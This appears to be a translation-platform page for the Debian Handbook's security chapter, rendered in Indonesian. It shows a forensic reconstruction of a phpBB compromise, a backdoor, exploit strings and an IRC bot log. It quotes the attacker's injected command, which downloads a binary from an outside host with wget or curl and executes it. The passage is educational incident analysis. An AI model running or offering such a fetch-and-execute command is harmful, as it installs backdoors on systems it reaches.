Zen

Translation

In parallel, the attacker also downloaded a pair of extra files, <filename>/tmp/pt</filename> and <filename>/tmp/loginx</filename>. Running these files through <command>strings</command> leads to strings such as <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and <foreignphrase>Now wait for suid shell...</foreignphrase>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
605/5530 · 553

Sign in to save the translation.

English Indonesian Actions
This example matches exploitation of an old security vulnerability in phpBB. <ulink type="block" url="https://www.phpbb.com/phpBB/viewtopic.php?t=240636" />
Contoh ini cocok dengan eksploitasi kerentanan keamanan lama di phpBB. <ulink type="block" url="https://www.phpbb.com/phpBB/viewtopic.php?t=240636" />
Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: <command>system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</command>. Indeed, a <filename>bd</filename> file was found in <filename>/tmp/</filename>. Running <command>strings /mnt/tmp/bd</command> returns, among other strings, <literal>PsychoPhobia Backdoor is starting...</literal>. This really looks like a backdoor.
Dekode URL panjang ini mengarah pada pemahaman bahwa penyerang berhasil menjalankan beberapa kode PHP, yaitu: <command>system("cd/tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</command>. Memang, berkas <filename>bd</filename> ditemukan di <filename>/tmp/</filename>. Menjalankan <command>strings /mnt/tmp/bd</command> mengembalikan, antara lain string, <literal>PsychoPhobia Backdoor is starting...</literal>. Ini benar-benar tampak seperti backdoor.
Some time later, this access was used to download, install and run an IRC <emphasis>bot</emphasis> that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
Beberapa waktu kemudian, akses ini digunakan untuk mengunduh, menginstal, dan menjalankan <emphasis>bot</emphasis> IRC yang terhubung ke jaringan IRC bawah tanah. Bot bisa kemudian dikendalikan melalui protokol ini dan diperintahkan untuk mengunduh berkas untuk dibagikan. Program ini bahkan memiliki berkas log sendiri:
** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
Jejak ini menunjukkan bahwa dua berkas video telah disimpan pada server melalui alamat IP 82.50.72.202.
In parallel, the attacker also downloaded a pair of extra files, <filename>/tmp/pt</filename> and <filename>/tmp/loginx</filename>. Running these files through <command>strings</command> leads to strings such as <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and <foreignphrase>Now wait for suid shell...</foreignphrase>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
Secara paralel, penyerang juga mengunduh berkas tambahan, <filename>/tmp/pt</filename> dan <filename>/tmp/loginx</filename>. Menjalankan berkas ini melalui <command>strings</command> mengarah ke string seperti <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> dan <foreignphrase>Now wait for suid shell...</foreignphrase>. Ini terlihat seperti program-program yang mengeksploitasi kelemahan lokal untuk mendapatkan hak akses administratif. Apakah mereka mencapai target mereka? Dalam kasus ini, mungkin tidak, karena tidak ada berkas yang tampak telah telah dimodifikasi setelah pelanggaran awal.
In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.
Dalam contoh ini, seluruh penyusupan telah direkonstruksi, dan dapat ditarik kesimpulan bahwa penyerang telah mampu mengambil keuntungan dari sistem yang terkompromi selama tiga hari; tapi unsur yang paling penting dalam analisis adalah bahwa kerentanan telah diidentifikasi, dan administrator dapat yakin bahwa instalasi baru benar-benar memperbaiki kerentanan.

Loading…

User avatar andika

Translation uploaded

  1. Debian Handbook
  2. 14_security
  3. Indonesian
In parallel, the attacker also downloaded a pair of extra files, <filename>/tmp/pt</filename> and <filename>/tmp/loginx</filename>. Running these files through <command>strings</command> leads to strings such as <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and <foreignphrase>Now wait for suid shell...</foreignphrase>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
Secara paralel, penyerang juga download filemengunduh berkas tambahan, <filename>/ tmp/pt</filename> dan <filename>dan/tmp/loginx</filename>. Menjalankan fileberkas ini melalui <command>senartrings</command> mengarah ke string seperti <foreignphrase>Shellcode ditempatkan di 0 x % placed at 0x%08lx</foreignphrase> dan <foreignphrase>sekarang menungguNow wait for suid shell...</foreignphrase>. Ini terlihat seperti program-program yang mengeksploitasi kelemahan lokal untuk mendapatkan hak akses administratif. Apakah mereka mencapai target mereka? Dalam kasus ini, mungkin tidak, karena file tidak ada berkas yang tampaknya telah telah dimodifikasi setelah pelanggaran awal.
4 years ago
User avatar andika

Translation added

  1. Debian Handbook
  2. 14_security
  3. Indonesian
In parallel, the attacker also downloaded a pair of extra files, <filename>/tmp/pt</filename> and <filename>/tmp/loginx</filename>. Running these files through <command>strings</command> leads to strings such as <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and <foreignphrase>Now wait for suid shell...</foreignphrase>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
Secara paralel, penyerang juga download file tambahan, <filename>/ tmp/pt</filename> <filename>dan/tmp/loginx</filename>. Menjalankan file ini melalui <command>senar</command> mengarah ke string seperti <foreignphrase>Shellcode ditempatkan di 0 x % 08lx</foreignphrase> dan <foreignphrase>sekarang menunggu suid shell...</foreignphrase>. Ini terlihat seperti program-program yang mengeksploitasi kelemahan lokal untuk mendapatkan hak akses administratif. Apakah mereka mencapai target mereka? Dalam kasus ini, mungkin tidak, karena file tidak ada tampaknya telah telah dimodifikasi setelah pelanggaran awal.
5 years ago
Browse all string changes

Things to check

Consecutive duplicated words

Text contains the same word twice in a row: telah

Reset

Glossary

English Indonesian
command perintah Debian Handbook

String information

Flags
xml-text
String age
9 years ago
Last updated
11 months ago
Source string age
9 years ago
Translation file
id-ID/14_security.po, string 550